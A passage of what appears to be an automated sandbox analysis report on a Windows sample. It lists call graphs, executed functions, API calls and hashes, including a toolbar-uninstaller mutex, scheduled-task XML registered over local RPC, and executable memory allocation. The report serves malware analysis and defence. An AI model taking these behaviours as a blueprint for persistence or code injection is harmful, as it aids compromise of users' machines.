b22d13 4195->4205 4222 b2377c 4195->4222 4196 b2207e __encode_pointer 6 API calls 4198 b22d21 4196->4198 4197->4201 4202 b2377c __realloc_crt 73 API calls 4197->4202 4203 b22d01 4197->4203 4199 b2207e __encode_pointer 6 API calls 4198->4199 4199->4201 4206 b22da6 4201->4206 4202->4203 4203->4201 4204 b2207e __encode_pointer 6 API calls 4203->4204 4204->4205 4205->4196 4272 b21486 4206->4272 4210 b253a6 _raise 4209->4210 4211 b253d3 4210->4211 4212 b253b6 4210->4212 4214 b25414 HeapSize 4211->4214 4216 b22aa0 __lock 66 API calls 4211->4216 4213 b22c72 _raise 66 API calls 4212->4213 4215 b253bb 4213->4215 4217 b253cb _raise 4214->4217 4218 b22c0a _raise 6 API calls 4215->4218 4219 b253e3 ___sbh_find_block 4216->4219 4217->4195 4218->4217 4227 b25434 4219->4227 4225 b23785 4222->4225 4224 b237c4 4224->4197 4225->4224 4226 b237a5 Sleep 4225->4226 4231 b2569d 4225->4231 4226->4225 4230 b229c6 LeaveCriticalSection 4227->4230 4229 b2540f 4229->4214 4229->4217 4230->4229 4232 b256a9 _raise 4231->4232 4233 b256b0 4232->4233 4234 b256be 4232->4234 4235 b254b5 _malloc 66 API calls 4233->4235 4236 b256d1 4234->4236 4237 b256c5 4234->4237 4240 b256b8 _raise _realloc 4235->4240 4245 b25843 4236->4245 4253 b256de ___sbh_resize_block ___sbh_find_block 4236->4253 4238 b235ee __mtinitlocknum 66 API calls 4237->4238 4238->4240 4239 b25876 4241 b231eb __calloc_impl 6 API calls 4239->4241 4240->4225 4244 b2587c 4241->4244 4242 b22aa0 __lock 66 API calls 4242->4253 4243 b25848 HeapReAlloc 4243->4240 4243->4245 4246 b22c72 _raise 66 API calls 4244->4246 4245->4239 4245->4243 4247 b2589a 4245->4247 4248 b231eb __calloc_impl 6 API calls 4245->4248 4250 b25890 4245->4250 4246->4240 4247->4240 4249 b22c72 _raise 66 API calls 4247->4249 4248->4245 4251 b258a3 GetLastError 4249->4251 4254 b22c72 _raise 66 API calls 4250->4254 4251->4240 4253->4239 4253->4240 4253->4242 4255 b25769 HeapAlloc 4253->4255 4256 b257be HeapReAlloc 4253->4256 4258 b24dc3 ___sbh_alloc_block 5 API calls 4253->4258 4259 b25829 4253->4259 4260 b231eb __calloc_impl 6 API calls 4253->4260 4262 b237f0 __VEC_memcpy _realloc 4253->4262 4264 b2580c 4253->4264 4267 b24614 VirtualFree VirtualFree HeapFree ___sbh_free_block 4253->4267 4268 b257e1 4253->4268 4266 b25811 4254->4266 4255->4253 4256->4253 4257 b25816 GetLastError 4257->4240 4258->4253 4259->4240 4261 b22c72 _raise 66 API calls 4259->4261 4260->4253 4263 b25836 4261->4263 4262->4253 4263->4240 4263->4251 4265 b22c72 _raise 66 API calls 4264->4265 4265->4266 4266->4240 4266->4257 4267->4253 4271 b229c6 LeaveCriticalSection 4268->4271 4270 b257e8 4270->4253 4271->4270 4275 b229c6 LeaveCriticalSection 4272->4275 4274 b2148d 4274->4185 4275->4274 4277 b220f0 _raise 6 API calls 4276->4277 4278 b216d3 __init_pointers __initp_misc_winsig 4277->4278 4298 b22913 4278->4298 4281 b2207e __encode_pointer 6 API calls 4282 b2170f 4281->4282 4282->3762 4286 b2292f 4283->4286 4284 b2317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 4284->4286 4285 b225a8 4285->3753 4285->3772 4286->4284 4286->4285 4288 b221b2 4287->4288 4289 b221be 4287->4289 4291 b220f9 __decode_pointer 6 API calls 4288->4291 4290 b221d2 TlsFree 4289->4290 4292 b221e0 4289->4292 4290->4292 4291->4289 4293 b2298b DeleteCriticalSection 4292->4293 4294 b229a3 4292->4294 4295 b235ee __mtinitlocknum 66 API calls 4293->4295 4296 b229c3 4294->4296 4297 b229b5 DeleteCriticalSection 4294->4297 4295->4292 4296->3757 4297->4294 4299 b2207e __encode_pointer 6 API calls 4298->4299 4300 b21705 4299->4300 4300->4281 4302 b21561 _raise 4301->4302 4303 b22aa0 __lock 66 API calls 4302->4303 4304 b21568 4303->4304 4305 b21621 __initterm 4304->4305 4308 b220f9 __decode_pointer 6 API calls 4304->4308 4318 b2166c 4305->4318 4310 b2159f 4308->4310 4309 b21669 _raise 4309->3794 4310->4305 4313 b220f9 __decode_pointer 6 API calls 4310->4313 4312 b21660 4314 b21465 __mtinitlocknum 3 API calls 4312->4314 4316 b215b4 4313->4316 4314->4309 4315 b220f0 6 API calls _raise 4315->4316 4316->4305 4316->4315 4317 b220f9 6 API calls __decode_pointer 4316->4317 4317->4316 4319 b21672 4318->4319 4320 b2164d 4318->4320 4323 b229c6 LeaveCriticalSection 4319->4323 4320->4309 4322 b229c6 LeaveCriticalSection 4320->4322 4322->4312 4323->4320 4931 b267c8 RtlUnwind 4411 b2122e 4414 b218fe 4411->4414 4413 b2123f 4415 b222cc __getptd_noexit 66 API calls 4414->4415 4416 b2190b 4415->4416 4416->4413 4416->4416 4483 b2458d 4486 b229c6 LeaveCriticalSection 4483->4486 4485 b24594 4486->4485

                                                                                        Executed Functions

                                                                                        Function 00B21000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B21006
                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,Global\IEToolbarUninstaller), ref: 00B21013
                                                                                        • GetLastError.KERNEL32 ref: 00B2101F
                                                                                        • GetCommandLineW.KERNEL32(?), ref: 00B21040
                                                                                        • CommandLineToArgvW.SHELL32(00000000), ref: 00B21047
                                                                                        • PathFileExistsW.SHLWAPI(tbcore3.dll), ref: 00B21061
                                                                                        • PathFileExistsW.SHLWAPI(tbcore3U.dll), ref: 00B21073
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B21085
                                                                                        • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00B21097
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B210A4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B210AB
                                                                                        • CoUninitialize.OLE32 ref: 00B210B1
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00B210BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                        • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                                        • API String ID: 474438367-4110843154
                                                                                        • Opcode ID: 9e73e81bb1819efc4213d0b2829b3f1c705ecdeec8faec081e8bc46dd5662059
                                                                                        • Instruction ID: 825b3236885ec5490c60d79743f94d407d4041b4e40a67c61aa94a3ff4e8dab4
                                                                                        • Opcode Fuzzy Hash: 9e73e81bb1819efc4213d0b2829b3f1c705ecdeec8faec081e8bc46dd5662059
                                                                                        • Instruction Fuzzy Hash: 7A11B132606275EB9331AB64BC48E9F37D8EA68752B0149A5F54EE3050CF218846C7B6
                                                                                        Function 02541437 Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • __RTC_Initialize.LIBCMT ref: 0254147E
                                                                                        • ___scrt_uninitialize_crt.LIBCMT ref: 02541498
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize___scrt_uninitialize_crt
                                                                                        • String ID:
                                                                                        • API String ID: 2442719207-0
                                                                                        • Opcode ID: fbb9217d6b3ea1309e49dc12e52dbc1dd7c19ee259579c80676a2fd9203456b3
                                                                                        • Instruction ID: bed9d6bc83c3abcf4d45918b5c010f19f453d330754dd35e83b839bdd1214f7f
                                                                                        • Opcode Fuzzy Hash: fbb9217d6b3ea1309e49dc12e52dbc1dd7c19ee259579c80676a2fd9203456b3
                                                                                        • Instruction Fuzzy Hash: 6941A672D00A29ABDB219F95D8407EEFA79FB807ADF01C515E81E57140DF308D819F98
                                                                                        Function 02541140 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 025410A0: RpcStringBindingComposeW.RPCRT4(02558850,ncacn_np,localhost,0255889C,00000000,?), ref: 025410DB
                                                                                          • Part of subcall function 025410A0: RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 025410E9
                                                                                          • Part of subcall function 025410A0: RpcBindingSetAuthInfoExA.RPCRT4(?,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0254111D
                                                                                          • Part of subcall function 025410A0: RpcStringFreeW.RPCRT4(?), ref: 02541127
                                                                                        • _swprintf.LIBCMTD ref: 025411A9
                                                                                          • Part of subcall function 02541060: __vswprintf_s_l.LIBCONCRTD ref: 0254107E
                                                                                        • _swprintf.LIBCMTD ref: 025411DC
                                                                                          • Part of subcall function 025412A0: NdrClientCall2.RPCRT4 ref: 025412BC
                                                                                        Strings
                                                                                        • <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi, xrefs: 02541198
                                                                                        • \%s, xrefs: 025411CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Binding$String$_swprintf$AuthCall2ClientComposeFreeFromInfo__vswprintf_s_l
                                                                                        • String ID: <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi$\%s
                                                                                        • API String ID: 2434665183-3516990142
                                                                                        • Opcode ID: f948f41bba39a1d773c43ea6b722a0f98e31bd682c8eaedfc60f234f95dca2f1
                                                                                        • Instruction ID: d813fc05d19ed0de3be0c7376d4ece9a2dedcdbf9448955312a9c3c361753486
                                                                                        • Opcode Fuzzy Hash: f948f41bba39a1d773c43ea6b722a0f98e31bd682c8eaedfc60f234f95dca2f1
                                                                                        • Instruction Fuzzy Hash: 0E2195F5950258ABDB10DF50DC41F9DB3F9BB44704F40C895BB0DAA180EE74AA888F9C
                                                                                        Function 0254A70F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0254A717
                                                                                          • Part of subcall function 0254A66C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0254E4AF,?,00000000,-00000008), ref: 0254A6CD
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0254A74F
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0254A76F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 158306478-0
                                                                                        • Opcode ID: c471f377dcbe4bd632b4c89c199e85c3e23da3d7b49b78e3e21526653f8116ff
                                                                                        • Instruction ID: 756e9aed870e3552541499af126fc416dd0d7bfaab7d7d56cf62e122ae5aecfc
                                                                                        • Opcode Fuzzy Hash: c471f377dcbe4bd632b4c89c199e85c3e23da3d7b49b78e3e21526653f8116ff
                                                                                        • Instruction Fuzzy Hash: FD1182B5A416167EA7A126759CACD7FFDAEEDC429C3000824F50591100EF209D0086BC
                                                                                        Function 0254017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 025401DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction ID: f63a95c7cac13aff6b3832ed30adf5e72f952002ca0a7ebfdaf71d5bfe49012d
                                                                                        • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction Fuzzy Hash: 94A15D70A00606EFDB18CFA9C880AADFBB5FF48308B648169E515D7391DB30E951CB94
                                                                                        Function 0254044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0254048B
                                                                                        • VirtualFree.KERNELBASE(?,?,00004000), ref: 025404F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction ID: 1ae7b434120c6243dd650189f65abe5e9dc0b147ebb9cad9dfc72f0dac97fad2
                                                                                        • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction Fuzzy Hash: 4421DE75500305ABDB249EA4CC84FAFFBF9BF44318F614468EB5AA21C1DF71A5019664
                                                                                        Function 0244044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0244048B
                                                                                        • VirtualFree.KERNELBASE(?,?,00004000), ref: 024404F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction ID: 3858d273b288665fbc9d42fb705c80cb357c240e5d032b0ce398393f52aabb61
                                                                                        • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                        • Instruction Fuzzy Hash: 59210B75A00305BBE7249EA48C80FAFB7F9AF04314F514429EB0AA2281DF31A9219A60
                                                                                        Function 02547700 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 104 2547700-254770c 105 254773e-2547749 call 25476b3 104->105 106 254770e-2547710 104->106 113 254774b-254774d 105->113 108 2547712-2547713 106->108 109 2547729-254773a RtlAllocateHeap 106->109 108->109 110 2547715-254771c call 254b39c 109->110 111 254773c 109->111 110->105 116 254771e-2547727 call 254acfe 110->116 111->113 116->105 116->109
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,025444B1,?,00000000,?,?,?,?,02544FB0,?,?,00000041,?), ref: 02547732
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 0079165aa86bb2cce24cf28f1ca465137b7cdb71b45082d5e63f912fa97d8849
                                                                                        • Instruction ID: 1025beda0e08746f4ca4f673ea68e17d01e405c47937846513524194efdf00d2
                                                                                        • Opcode Fuzzy Hash: 0079165aa86bb2cce24cf28f1ca465137b7cdb71b45082d5e63f912fa97d8849
                                                                                        • Instruction Fuzzy Hash: 30E06531941226A7E6212A769D04F5AFE4AFF896ACF950511AC15A6190DF60D800CAEC
                                                                                        Function 00B2261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 119 b2261b-b2263d HeapCreate 120 b22641-b2264a 119->120 121 b2263f-b22640 119->121
                                                                                        APIs
                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00B22630
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0
                                                                                        • Opcode ID: 811f2e9ed0baea609c724846832d731e2298658fb9676675657f0195c0cde08c
                                                                                        • Instruction ID: 7f405acfac8455b12e45efef596dc1d06f11f6ea81f3453de8c3150bbd3d7bd5
                                                                                        • Opcode Fuzzy Hash: 811f2e9ed0baea609c724846832d731e2298658fb9676675657f0195c0cde08c
                                                                                        • Instruction Fuzzy Hash: EFD0A7325543456EEB205F717C48B223BDCD384795F104475B90CC7260FE70D992CA44
                                                                                        Function 0244017F Relevance: 1.5, APIs: 1, Instructions: 267memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 024401DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction ID: 707035d8fb084b7d50352dafe5e0d3ea22c218e70a9efd2db2f4bdc1438e07ff
                                                                                        • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                        • Instruction Fuzzy Hash: 5BA16F70A00606EFEB18CFA9C880AAEB7B5FF48308F54516AE515DB351DB70E961CF90
                                                                                        Function 025412A0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 122 25412a0-25412ce NdrClientCall2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514566277.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: Call2Client
                                                                                        • String ID:
                                                                                        • API String ID: 1775071923-0
                                                                                        • Opcode ID: 4666de08af870ddb6bef69c0f490482e33997d6d42adbca8fb7ab2f5f23bbb04
                                                                                        • Instruction ID: bd2d5c4a6279affdb845742771da5e8caae126a025c3303e8fa798e8260075a2
                                                                                        • Opcode Fuzzy Hash: 4666de08af870ddb6bef69c0f490482e33997d6d42adbca8fb7ab2f5f23bbb04
                                                                                        • Instruction Fuzzy Hash: FDD05EB1A01208BBD704CE98DC51AE97BECE785201F0040AAED0AC2200E9355A545699

                                                                                        Non-executed Functions

                                                                                        Function 00B210CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00B21346
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B2135B
                                                                                        • UnhandledExceptionFilter.KERNEL32(00B2816C), ref: 00B21366
                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B21382
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B21389
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000002.3514225993.0000000000B21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B20000, based on PE: true
                                                                                        • Associated: 00000028.00000002.3514200896.0000000000B20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514252671.0000000000B28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514278623.0000000000B2A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000028.00000002.3514303518.0000000000B2C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_2_b20000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2579439406-0
                                                                                        • Opcode ID: 299fc83960eea0c34b69bc74372044eac10b1eaada45dbfda9bb6e0b039b1dfc
                                                                                        • Instruction ID: a7d45a04b20c189c53d7480d5ffc85a7c69ab49b7c655167a5ecdda9e7572117
                                                                                        • Opcode Fuzzy Hash: 299fc83960eea0c34b69bc74372044eac10b1eaada45dbfda9bb6e0b039b1dfc
                                                                                        • Instruction Fuzzy Hash: C421CCB4811204DFC730DF28FD846493BB4FB18792F40446AE50897A61EFB8598ACF5B
                                                                                        Function 025400CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction ID: d4a5a6343f07ed69ea2e5c8dc1c274cfce36ae9923bff03bb06d71050e8e4c7f
                                                                                        • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction Fuzzy Hash: 94117CB5600602AFCB19AF18D408A1FFBA6FF89710B618159E10997750FB34EA218BD9
                                                                                        Function 024400CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction ID: b795de194978db9d274ba09186b0edf29e11cf9cc6a41e0792bd0f5dc02de25b
                                                                                        • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                        • Instruction Fuzzy Hash: 74118EB5700601AFDB19AF19E408A0EBBF6FF89710B21815EE10597710EF34EA218FD5
                                                                                        Function 02540643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3240271717.0000000002540000.00000040.00001000.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2540000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction ID: 35f231bdab73eea31f3f6f012976c4545ed0d9273bc5045d03c60da3c2980b5f
                                                                                        • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction Fuzzy Hash: 6501C871700114AFCB04DF98C840DAEFBB9FF84754F104099FA05A7350DA70DE048B95
                                                                                        Function 02440643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000028.00000003.3243525764.0000000002440000.00000040.00001000.00020000.00000000.sdmp, Offset: 02440000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_40_3_2440000_2dHqG0.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: l$ntdl
                                                                                        • API String ID: 0-924918826
                                                                                        • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction ID: b66a8a4a2e577378a2f9880da52495e4ed0209503bcab41ba5c321d5b85d6906
                                                                                        • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                        • Instruction Fuzzy Hash: 7E01C472B00614AFDB14DF99C840DAEFBB9EF88754F00409EFA05A7360DA70DE148BA1
                                                                                        Function 00B221E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B29458,0000000C,00B22320,00000000,00000000,?,00B2174F,00000003,?,?,?,?,?,?,00B210F6), ref: 00B221F7
                                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 00B22202
                                                                                          • Part of subcall function 00B213E1: Sleep.KERNEL32(000003E8,00000000,?,00B22148,KERNEL32.DLL,?,00B22194,?,00B2174F,00000003), ref: 00B213ED
                                                                                          • Part of subcall function 00B213E1: GetModuleHandleW.KERNEL32(?,?,00B22148,KERNEL32.DLL,?,00B22194,?,00B2174F,00000003,?,?,?,?,?,?,00B210F6), ref: 00B213F6
                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00B2222B
                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00B2223B
                                                                                        • __lock.LIBCMT ref: 00B2225D
                                                                                        • InterlockedIncrement.KERNEL32(00B2A4D8), ref: 00B2226A
                                                                                        • __lock.LIBCMT ref: 00B2227E
